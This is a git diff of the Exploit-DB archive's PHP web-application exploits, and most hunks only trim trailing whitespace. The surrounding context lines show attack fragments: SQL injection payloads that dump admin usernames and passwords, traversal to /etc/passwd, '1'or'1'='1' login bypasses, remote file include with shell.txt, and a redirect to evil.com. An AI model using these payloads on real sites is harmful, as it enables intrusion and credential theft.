-------------------------------------- - +------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/15154.txt b/exploits/php/webapps/15154.txt index 0cc9459b1..2d815b268 100644 --- a/exploits/php/webapps/15154.txt +++ b/exploits/php/webapps/15154.txt @@ -17,4 +17,4 @@ then get username & password n then go to the admin panel ,, # Greetings: Dr.2 , Inject0r's Community , AsbMay's Group , darkc0de team , and all ma friends ,, -== +== \ No newline at end of file diff --git a/exploits/php/webapps/15173.txt b/exploits/php/webapps/15173.txt index 67d8154b2..cc41ad409 100644 --- a/exploits/php/webapps/15173.txt +++ b/exploits/php/webapps/15173.txt @@ -31,4 +31,4 @@ www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false www.site.com/detail_article.php?C=3&P=7"> - #################################################################### + #################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15223.txt b/exploits/php/webapps/15223.txt index 79637e371..2a183fe71 100644 --- a/exploits/php/webapps/15223.txt +++ b/exploits/php/webapps/15223.txt @@ -24,4 +24,4 @@ AQ. "Rüyalarýma bitek Uyuyoken kavuþuyosam Anladýmki Ölmekte zor deðil.." http://VICTIM/Path/pwn.php?ID=1 [Blind] http://VICTIM/Path/pwn.php?ID=1 and 1=0 http://VICTIM/Path/pwn.php?ID=1 and 1=1 - ================================ + ================================ \ No newline at end of file diff --git a/exploits/php/webapps/15251.txt b/exploits/php/webapps/15251.txt index f4ece1e06..97c823209 100644 --- a/exploits/php/webapps/15251.txt +++ b/exploits/php/webapps/15251.txt @@ -33,4 +33,4 @@ clans website... no problem.---------------------------------------------------- # sky4@live.com # 4hm4d H0w4ri # Palestine In our Hearts -############################################################## +############################################################## \ No newline at end of file diff --git a/exploits/php/webapps/15338.txt b/exploits/php/webapps/15338.txt index 7e74aca77..9c8bf922a 100644 --- a/exploits/php/webapps/15338.txt +++ b/exploits/php/webapps/15338.txt @@ -29,4 +29,4 @@ Contact : eragon@legends.ag [ Special Thanks : KuBaNeZi , DJ-DUKLI , The|Denny` , Loock3D , BaDBoY ] -[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ] +[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ] \ No newline at end of file diff --git a/exploits/php/webapps/15389.php b/exploits/php/webapps/15389.php index b2697b474..47f68ef82 100644 --- a/exploits/php/webapps/15389.php +++ b/exploits/php/webapps/15389.php @@ -73,6 +73,4 @@ while(1) } else break; } -?> - - +?> \ No newline at end of file diff --git a/exploits/php/webapps/15430.txt b/exploits/php/webapps/15430.txt index 2a85e66ec..c709fb8c2 100644 --- a/exploits/php/webapps/15430.txt +++ b/exploits/php/webapps/15430.txt @@ -24,4 +24,4 @@ Joomla Component ccinvoices SQL Injection Vulnerability < -- bug code start -- > EXPLOIT : null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -< -- bug code end of -- > +< -- bug code end of -- > \ No newline at end of file diff --git a/exploits/php/webapps/15452.txt b/exploits/php/webapps/15452.txt index 79d2159e5..d90e0a1b8 100644 --- a/exploits/php/webapps/15452.txt +++ b/exploits/php/webapps/15452.txt @@ -21,4 +21,4 @@ http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=userna http://www.site.com/[path]/moderate.php?get_host[]= -#SYSTEM_OVERIDE [07-11-2010] +#SYSTEM_OVERIDE [07-11-2010] \ No newline at end of file diff --git a/exploits/php/webapps/15453.txt b/exploits/php/webapps/15453.txt index 40ae5aba2..3d351ef06 100644 --- a/exploits/php/webapps/15453.txt +++ b/exploits/php/webapps/15453.txt @@ -15,6 +15,4 @@ http://site.com/index.php?option=com_ckforms&controller=../../../. ./../../../../../../etc/passwd%00 #################################################################### -RxH & ab0-3th4b - - +RxH & ab0-3th4b \ No newline at end of file diff --git a/exploits/php/webapps/15454.txt b/exploits/php/webapps/15454.txt index 65de6b7aa..5289db34f 100644 --- a/exploits/php/webapps/15454.txt +++ b/exploits/php/webapps/15454.txt @@ -16,6 +16,4 @@ www.site.com/index.php?action=com_clan&cid=185[Sql Injection] 185+and+1=2+union+select+1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8 -#################################################################### - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15524.txt b/exploits/php/webapps/15524.txt index 4cb795b01..20a5e6245 100644 --- a/exploits/php/webapps/15524.txt +++ b/exploits/php/webapps/15524.txt @@ -13,6 +13,4 @@ In The Name Of GOD go to /signinform.php Username : admin - Password : 1'or'1'='1 - - + Password : 1'or'1'='1 \ No newline at end of file diff --git a/exploits/php/webapps/15568.py b/exploits/php/webapps/15568.py index 5f0ea7551..f7cb091a8 100755 --- a/exploits/php/webapps/15568.py +++ b/exploits/php/webapps/15568.py @@ -244,5 +244,4 @@ if sys.argv[3] == '-s': if len(sys.argv) < 4: printHelp() getSchemas(sessid, sys.argv[1], sys.argv[2], valId) - exit(0) - + exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/15574.txt b/exploits/php/webapps/15574.txt index 2954cc9df..c646ef0a0 100644 --- a/exploits/php/webapps/15574.txt +++ b/exploits/php/webapps/15574.txt @@ -45,4 +45,4 @@ http://127.0.0.1/clip/index.php?v= {EV!L EXPLO!T} # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/15585.txt b/exploits/php/webapps/15585.txt index dca89229a..b58f8d78d 100644 --- a/exploits/php/webapps/15585.txt +++ b/exploits/php/webapps/15585.txt @@ -19,7 +19,4 @@ http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../. _______________________________________________________________________ Thanks to : All RosebanditZ Team & All IndonesiaCoder -_______________________________________________________________________ - - - +_______________________________________________________________________ \ No newline at end of file diff --git a/exploits/php/webapps/15593.html b/exploits/php/webapps/15593.html index e9f61d5c7..5af905878 100644 --- a/exploits/php/webapps/15593.html +++ b/exploits/php/webapps/15593.html @@ -21,4 +21,4 @@ action="http://www.site.com:2082/frontend/x3/contact/saveemail.html"> -------------------------------------------------------------------------------------- -Gr33ts : RENO - Mr.M3x - all Member p0c Team .. +Gr33ts : RENO - Mr.M3x - all Member p0c Team .. \ No newline at end of file diff --git a/exploits/php/webapps/15621.txt b/exploits/php/webapps/15621.txt index 6974bfa5a..2db337daa 100644 --- a/exploits/php/webapps/15621.txt +++ b/exploits/php/webapps/15621.txt @@ -24,7 +24,4 @@ di anak tirikan karena ga tersebut nicknya) [#]------------------------------------------------------------------- note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap -apa yang kau katakan! - - - +apa yang kau katakan! \ No newline at end of file diff --git a/exploits/php/webapps/15638.txt b/exploits/php/webapps/15638.txt index 0f2714056..a74896693 100644 --- a/exploits/php/webapps/15638.txt +++ b/exploits/php/webapps/15638.txt @@ -36,5 +36,4 @@ Duhok Forum Remot upload Vulnerability greetz : kader11000 lagripe-dz mca_crb NetCat-Dz all dz members -www.h4kz.net www.v4-team.com www.vbspiders.com www.dz4all.com/cc - +www.h4kz.net www.v4-team.com www.vbspiders.com www.dz4all.com/cc \ No newline at end of file diff --git a/exploits/php/webapps/15720.txt b/exploits/php/webapps/15720.txt index 7394ca7a3..0ee174ab1 100644 --- a/exploits/php/webapps/15720.txt +++ b/exploits/php/webapps/15720.txt @@ -40,7 +40,4 @@ Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ] note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap -apa yang kau katakan! - - - +apa yang kau katakan! \ No newline at end of file diff --git a/exploits/php/webapps/15813.txt b/exploits/php/webapps/15813.txt index 163e841bf..09445d9a5 100644 --- a/exploits/php/webapps/15813.txt +++ b/exploits/php/webapps/15813.txt @@ -63,6 +63,4 @@ exit(); Password: 'or'a'='a -#################################################################### - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15814.txt b/exploits/php/webapps/15814.txt index b67dc7b3e..44b529b67 100644 --- a/exploits/php/webapps/15814.txt +++ b/exploits/php/webapps/15814.txt @@ -13,8 +13,4 @@ Joomla Component com_ponygallery Multiple Remote File Include www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15815.txt b/exploits/php/webapps/15815.txt index 73c30307c..459e4035d 100644 --- a/exploits/php/webapps/15815.txt +++ b/exploits/php/webapps/15815.txt @@ -12,8 +12,4 @@ Joomla Component com_adsmanager Remote File Include www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?] -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15822.html b/exploits/php/webapps/15822.html index a5e885dc6..71f8a119d 100644 --- a/exploits/php/webapps/15822.html +++ b/exploits/php/webapps/15822.html @@ -23,4 +23,4 @@ -NICKNAME: P0C T34M +NICKNAME: P0C T34M \ No newline at end of file diff --git a/exploits/php/webapps/15887.txt b/exploits/php/webapps/15887.txt index 8a46dcbc3..b2389450b 100644 --- a/exploits/php/webapps/15887.txt +++ b/exploits/php/webapps/15887.txt @@ -82,4 +82,4 @@ ############################################### - [ dun / 2011 ] + [ dun / 2011 ] \ No newline at end of file diff --git a/exploits/php/webapps/15889.txt b/exploits/php/webapps/15889.txt index a17e78b6d..c04364adf 100644 --- a/exploits/php/webapps/15889.txt +++ b/exploits/php/webapps/15889.txt @@ -60,4 +60,4 @@ ############################################### - [ dun / 2011-01-01 ] + [ dun / 2011-01-01 ] \ No newline at end of file diff --git a/exploits/php/webapps/15891.txt b/exploits/php/webapps/15891.txt index e6aba107c..2b9ad6bf0 100644 --- a/exploits/php/webapps/15891.txt +++ b/exploits/php/webapps/15891.txt @@ -18,8 +18,4 @@ www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a www.site.com/gadmin/index.php -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15892.html b/exploits/php/webapps/15892.html index df83372c0..99f35a038 100644 --- a/exploits/php/webapps/15892.html +++ b/exploits/php/webapps/15892.html @@ -23,8 +23,4 @@ YourTube v1.0 CSRF Vulnerability (Add User) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15999.txt b/exploits/php/webapps/15999.txt index 64f2c0d6d..148c6018a 100644 --- a/exploits/php/webapps/15999.txt +++ b/exploits/php/webapps/15999.txt @@ -17,4 +17,4 @@ == [#] Greetings: darkc0de's team , AsbMay's Group , w4ck1ng team , Q8 , and all muslims .. -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16018.txt b/exploits/php/webapps/16018.txt index c50e8422d..5464eed52 100644 --- a/exploits/php/webapps/16018.txt +++ b/exploits/php/webapps/16018.txt @@ -16,4 +16,4 @@ == [#]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16019.txt b/exploits/php/webapps/16019.txt index 61edeab07..32466e859 100644 --- a/exploits/php/webapps/16019.txt +++ b/exploits/php/webapps/16019.txt @@ -58,4 +58,4 @@ Already Tested on Win Xp # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/16020.txt b/exploits/php/webapps/16020.txt index 9a82fbd2b..c2b3be8db 100644 --- a/exploits/php/webapps/16020.txt +++ b/exploits/php/webapps/16020.txt @@ -16,4 +16,4 @@ == [+]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16034.txt b/exploits/php/webapps/16034.txt index 5b22f59d5..8637efa0b 100644 --- a/exploits/php/webapps/16034.txt +++ b/exploits/php/webapps/16034.txt @@ -17,4 +17,4 @@ == [|]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16037.html b/exploits/php/webapps/16037.html index d3d0e323a..fdc68385e 100644 --- a/exploits/php/webapps/16037.html +++ b/exploits/php/webapps/16037.html @@ -31,8 +31,4 @@ PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16047.txt b/exploits/php/webapps/16047.txt index d1df11b69..ca6d76cf4 100644 --- a/exploits/php/webapps/16047.txt +++ b/exploits/php/webapps/16047.txt @@ -21,8 +21,4 @@ www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user, www.site.com/admin/login.php -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16062.txt b/exploits/php/webapps/16062.txt index 6b32a16d8..19c8aa634 100644 --- a/exploits/php/webapps/16062.txt +++ b/exploits/php/webapps/16062.txt @@ -18,5 +18,4 @@ after getting the username and the password you can login to admin panel [path]/admin == [-]Greetings: -darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" - +darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" \ No newline at end of file diff --git a/exploits/php/webapps/16069.txt b/exploits/php/webapps/16069.txt index afa0dc949..b0e9e0df1 100644 --- a/exploits/php/webapps/16069.txt +++ b/exploits/php/webapps/16069.txt @@ -15,4 +15,4 @@ Link: http://www.softbizsolutions.com/script-directory-software.php == Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== +== \ No newline at end of file diff --git a/exploits/php/webapps/16087.txt b/exploits/php/webapps/16087.txt index 25e036b90..2813d260e 100644 --- a/exploits/php/webapps/16087.txt +++ b/exploits/php/webapps/16087.txt @@ -62,5 +62,4 @@ http://www.target.com[path pmb]/index.php?lvl=coll_see&id=-1/**/union/**/select+ #Site : http://vbspiders.com #Critical Lvl : Dangerous #Mail: nourie.tlm[at]gmail.com ---------------------- Hack To Learn, Learn To Hack---------------------------- - +--------------------- Hack To Learn, Learn To Hack---------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/16122.txt b/exploits/php/webapps/16122.txt index 5caf542cb..b1860d4c9 100644 --- a/exploits/php/webapps/16122.txt +++ b/exploits/php/webapps/16122.txt @@ -23,6 +23,4 @@ Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password ###################################################################### -txt - - +txt \ No newline at end of file diff --git a/exploits/php/webapps/16167.txt b/exploits/php/webapps/16167.txt index 10f2c765f..de09ff0e1 100644 --- a/exploits/php/webapps/16167.txt +++ b/exploits/php/webapps/16167.txt @@ -26,7 +26,4 @@ IV. Credits - God - bawahtanah_sii : tenro, sality23, em32, tdos, kiwill and my-Org - XCODE - semua [komunitas IT dan netter] underground INDONESIA -- All Friend's and Enemy who know me - - - +- All Friend's and Enemy who know me \ No newline at end of file diff --git a/exploits/php/webapps/16256.txt b/exploits/php/webapps/16256.txt index bd19444ee..2e23f44d1 100644 --- a/exploits/php/webapps/16256.txt +++ b/exploits/php/webapps/16256.txt @@ -14,5 +14,4 @@ www.site.com/archives.php?pid=null[Sql] www.site.com/page.php?pid=null+and+1=2+union+select+concat(username,0x3a,psword)+from+tbladmin_users www.site.com/archives.php?pid=null+and+1=2+union+select+1,2,3,concat(username,0x3a,psword),5,6,7,8,9,10,11+from+tbladmin_users -#################################################################### - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16257.txt b/exploits/php/webapps/16257.txt index 3574603ba..b27e36abb 100644 --- a/exploits/php/webapps/16257.txt +++ b/exploits/php/webapps/16257.txt @@ -12,5 +12,4 @@ SnapProof (page.php) Sql Injection Vulnerability www.site.com/page.php?pID=null[Sql] www.site.com/page.php?pID=null+and+1=2+union+select+1,2,3,4 -#################################################################### - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/16934.pl b/exploits/php/webapps/16934.pl index 0ca3f0e38..f54517b62 100755 --- a/exploits/php/webapps/16934.pl +++ b/exploits/php/webapps/16934.pl @@ -77,5 +77,4 @@ for($i=1;$i<=$ARGV[3];$i++){ print v_request('Email: ','email','user','userid='.$2); } -} - +} \ No newline at end of file diff --git a/exploits/php/webapps/16937.pl b/exploits/php/webapps/16937.pl index c8459344a..b3d29d54c 100755 --- a/exploits/php/webapps/16937.pl +++ b/exploits/php/webapps/16937.pl @@ -34,6 +34,4 @@ my $response = $ua->get($ARGV[0].'/eggavatar.php?eggavatar.php?do=showeggs&u=1&o } else { die $response->status_line; - } - - + } \ No newline at end of file diff --git a/exploits/php/webapps/17007.txt b/exploits/php/webapps/17007.txt index cb250ffe6..18cd5440f 100644 --- a/exploits/php/webapps/17007.txt +++ b/exploits/php/webapps/17007.txt @@ -115,5 +115,4 @@ Vulnerable Javascript Source Code: [+] INDONESIANCODER still r0x... [+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat .. -[+] Malang Cyber Crew & Magelang Cyber Community - +[+] Malang Cyber Crew & Magelang Cyber Community \ No newline at end of file diff --git a/exploits/php/webapps/17018.txt b/exploits/php/webapps/17018.txt index c937ab070..d522739e4 100644 --- a/exploits/php/webapps/17018.txt +++ b/exploits/php/webapps/17018.txt @@ -28,5 +28,4 @@ POC http://site.com/blog/addComment.php?stat=stat&type=t&category_id=9&topic_id=-122/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- thanks, --p0pc0rn- - +-p0pc0rn- \ No newline at end of file diff --git a/exploits/php/webapps/17091.html b/exploits/php/webapps/17091.html index 9464cc566..ee37081df 100644 --- a/exploits/php/webapps/17091.html +++ b/exploits/php/webapps/17091.html @@ -20,8 +20,4 @@ E-Store 1.0 XSRF Vulnerability (Add Admin) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17092.html b/exploits/php/webapps/17092.html index 094e7d98b..9c29e7c7b 100644 --- a/exploits/php/webapps/17092.html +++ b/exploits/php/webapps/17092.html @@ -20,8 +20,4 @@ News 1.0 XSRF Vulnerability (Add Admin) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17093.html b/exploits/php/webapps/17093.html index 0ef8de82f..d0053aff6 100644 --- a/exploits/php/webapps/17093.html +++ b/exploits/php/webapps/17093.html @@ -20,8 +20,4 @@ Movies Library 2.0 XSRF Vulnerability (Add Admin) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17094.html b/exploits/php/webapps/17094.html index e3c88140e..44e70b562 100644 --- a/exploits/php/webapps/17094.html +++ b/exploits/php/webapps/17094.html @@ -20,8 +20,4 @@ Web Links 1.0 XSRF Vulnerability (Add Admin) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17095.html b/exploits/php/webapps/17095.html index 89715271c..1a7098877 100644 --- a/exploits/php/webapps/17095.html +++ b/exploits/php/webapps/17095.html @@ -20,8 +20,4 @@ Audio & Video Library 2.7.0 XSRF Vulnerability (Add Admin) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17096.html b/exploits/php/webapps/17096.html index cdad7d3f2..1c53f95f6 100644 --- a/exploits/php/webapps/17096.html +++ b/exploits/php/webapps/17096.html @@ -20,8 +20,4 @@ Super Multimedia Library 2.5.0 XSRF Vulnerability (Add Admin) -#################################################################### - - - - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/17146.txt b/exploits/php/webapps/17146.txt index e600ff358..401ed57c2 100644 --- a/exploits/php/webapps/17146.txt +++ b/exploits/php/webapps/17146.txt @@ -52,4 +52,4 @@ Already Tested on Win Xp # [~](>D!R 4ll 0R D!E<) #; # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/17173.txt b/exploits/php/webapps/17173.txt index a33385a4f..2c7fba2db 100644 --- a/exploits/php/webapps/17173.txt +++ b/exploits/php/webapps/17173.txt @@ -38,4 +38,4 @@ # 1337 Member: r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger # Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul, =========================================================================== -# DisCovered By XroGuE !!! +# DisCovered By XroGuE !!! \ No newline at end of file diff --git a/exploits/php/webapps/17180.txt b/exploits/php/webapps/17180.txt index c03dc7f69..891019900 100644 --- a/exploits/php/webapps/17180.txt +++ b/exploits/php/webapps/17180.txt @@ -18,6 +18,4 @@ # Zend -=- Virangar-=-Milad-Bushehr -=- Iman_TakTaz -=- M3QD4D -=- Hijacker # # -=- elvator -=- r3d.z0nE -=- Behrooz_Ice -=- Ali_Eagle -=- Satanic2000 -=- Rz04 # # # -###################################### TNX All ###################################### - - +###################################### TNX All ###################################### \ No newline at end of file diff --git a/exploits/php/webapps/17292.txt b/exploits/php/webapps/17292.txt index f8503b9a5..17bcfc9d1 100644 --- a/exploits/php/webapps/17292.txt +++ b/exploits/php/webapps/17292.txt @@ -21,4 +21,4 @@ http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../ http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd -http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd +http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/17309.txt b/exploits/php/webapps/17309.txt index 8374690fb..733ac018d 100644 --- a/exploits/php/webapps/17309.txt +++ b/exploits/php/webapps/17309.txt @@ -29,7 +29,7 @@ the MP3 file format provided with the standard PHPCaptcha package available from www.phpcaptcha.org is available at: http://www.senseofsecurity.com.au/advisories/SOS-11-007.zip -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17309.zip (SOS-11-007.zip) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17309.zip (SOS-11-007.zip) Proof of concept code is only available for the MP3 version of the audio, however the WAV audio format is also affected by the same diff --git a/exploits/php/webapps/17346.php b/exploits/php/webapps/17346.php index 1188864ad..608673b69 100644 --- a/exploits/php/webapps/17346.php +++ b/exploits/php/webapps/17346.php @@ -148,4 +148,4 @@ else echo "+---------------------------------------------------------------+\r\n"; echo "\n\n"; } -?> +?> \ No newline at end of file diff --git a/exploits/php/webapps/17737.txt b/exploits/php/webapps/17737.txt index b49b4987f..df14fc74d 100644 --- a/exploits/php/webapps/17737.txt +++ b/exploits/php/webapps/17737.txt @@ -16,4 +16,4 @@ Vulnerable code if($_REQUEST['action']=="activate"){ $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']); ... - $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'"; + $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'"; \ No newline at end of file diff --git a/exploits/php/webapps/17943.txt b/exploits/php/webapps/17943.txt index dde796216..5f39d315d 100644 --- a/exploits/php/webapps/17943.txt +++ b/exploits/php/webapps/17943.txt @@ -28,5 +28,4 @@ bd0rk's-Fixtip: Percolate the l-parameter before $_GET -Greetings from Germany, the 22 years old bd0rk. - +Greetings from Germany, the 22 years old bd0rk. \ No newline at end of file diff --git a/exploits/php/webapps/17980.txt b/exploits/php/webapps/17980.txt index 791147054..239fe4a7d 100644 --- a/exploits/php/webapps/17980.txt +++ b/exploits/php/webapps/17980.txt @@ -76,4 +76,4 @@ Patch FROM $settings_table_name ! WHERE form_id = ".$wpcf_easyform_formid." ORDER BY position - "); + "); \ No newline at end of file diff --git a/exploits/php/webapps/18036.txt b/exploits/php/webapps/18036.txt index acd059317..e4621e5a5 100644 --- a/exploits/php/webapps/18036.txt +++ b/exploits/php/webapps/18036.txt @@ -223,4 +223,4 @@ [09/10/2011] - Others vulnerabilities discovered [11/10/2011] - Issues reported to http://bugs.efrontlearning.net/browse/EF-675 [26/10/2011] - Vendor update released: http://forum.efrontlearning.net/viewtopic.php?t=3501 - [27/10/2011] - Public disclosure + [27/10/2011] - Public disclosure \ No newline at end of file diff --git a/exploits/php/webapps/18063.txt b/exploits/php/webapps/18063.txt index 07aac237c..78f606443 100644 --- a/exploits/php/webapps/18063.txt +++ b/exploits/php/webapps/18063.txt @@ -22,4 +22,4 @@ # # http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL) # -################################################################################################ +################################################################################################ \ No newline at end of file diff --git a/exploits/php/webapps/18090.txt b/exploits/php/webapps/18090.txt index 851ab50ce..5566e58e7 100644 --- a/exploits/php/webapps/18090.txt +++ b/exploits/php/webapps/18090.txt @@ -24,9 +24,4 @@ http://localhost/labstore/stocks/interface_creator/index.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC http://localhost/labstore/stocks/interface_creator/index_long.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC - http://localhost/labstore/stocks/interface_creator/index_short.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC - - - - - + http://localhost/labstore/stocks/interface_creator/index_short.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC \ No newline at end of file diff --git a/exploits/php/webapps/18236.txt b/exploits/php/webapps/18236.txt index 572bbfc0a..68b41aca9 100644 --- a/exploits/php/webapps/18236.txt +++ b/exploits/php/webapps/18236.txt @@ -15,15 +15,4 @@ e-mail:
web(optional):
comment:
- - - - - - - - - - - - + \ No newline at end of file diff --git a/exploits/php/webapps/18330.txt b/exploits/php/webapps/18330.txt index d6686b3ee..539ab0e56 100644 --- a/exploits/php/webapps/18330.txt +++ b/exploits/php/webapps/18330.txt @@ -21,4 +21,4 @@ The final download link will be replaced with [REDIRECT-TO-URL] - POC: pay.php?link=%22>&title=&dl=http://brindi.si%27"> + POC: pay.php?link=%22>&title=&dl=http://brindi.si%27"> \ No newline at end of file diff --git a/exploits/php/webapps/18350.txt b/exploits/php/webapps/18350.txt index 28cb9296f..ca47899ec 100644 --- a/exploits/php/webapps/18350.txt +++ b/exploits/php/webapps/18350.txt @@ -15,5 +15,4 @@ age_month: 1 age_year: 1970 - Direct redirect to http://www.evil.com - + Direct redirect to http://www.evil.com \ No newline at end of file diff --git a/exploits/php/webapps/18527.txt b/exploits/php/webapps/18527.txt index 458b50126..60c3107d4 100644 --- a/exploits/php/webapps/18527.txt +++ b/exploits/php/webapps/18527.txt @@ -52,4 +52,4 @@ Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attac -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18536.txt b/exploits/php/webapps/18536.txt index ceeb47436..c7269b86b 100644 --- a/exploits/php/webapps/18536.txt +++ b/exploits/php/webapps/18536.txt @@ -58,4 +58,4 @@ administrator account and how to modify an existing and published web pages. oth -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18575.txt b/exploits/php/webapps/18575.txt index d66dbf0dd..8655da8d1 100644 --- a/exploits/php/webapps/18575.txt +++ b/exploits/php/webapps/18575.txt @@ -33,4 +33,4 @@ and unpublished. In this POC I've deleted web page with ID=2 -+------------------------------------------------------------------------------------------------------------------------------------+ ++------------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18598.txt b/exploits/php/webapps/18598.txt index 8e3b2f94d..7a76c9f87 100644 --- a/exploits/php/webapps/18598.txt +++ b/exploits/php/webapps/18598.txt @@ -19,8 +19,4 @@ InyeXion,LinuxFer, Scorp [PoC] -http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- - - - - +http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- \ No newline at end of file diff --git a/exploits/php/webapps/18652.txt b/exploits/php/webapps/18652.txt index d42db2eda..404664263 100644 --- a/exploits/php/webapps/18652.txt +++ b/exploits/php/webapps/18652.txt @@ -76,4 +76,4 @@ This cms is also affected by XSS vulnerabilities in "wolfcms/admin/user/add" pag "> -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18694.txt b/exploits/php/webapps/18694.txt index 7cf771113..ae5d014cd 100644 --- a/exploits/php/webapps/18694.txt +++ b/exploits/php/webapps/18694.txt @@ -82,4 +82,4 @@ Other parameters can be also modified. -+--------------------------------------------------------------------------------------------------------------------------------+ ++--------------------------------------------------------------------------------------------------------------------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/18965.html b/exploits/php/webapps/18965.html index 7a610b642..d4b042349 100644 --- a/exploits/php/webapps/18965.html +++ b/exploits/php/webapps/18965.html @@ -47,5 +47,4 @@ CSRF (Add Reseller) -################################################################################## - +################################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/19431.txt b/exploits/php/webapps/19431.txt index 6f3a86fbc..08f6a2c35 100644 --- a/exploits/php/webapps/19431.txt +++ b/exploits/php/webapps/19431.txt @@ -86,9 +86,4 @@ # # Vuln: 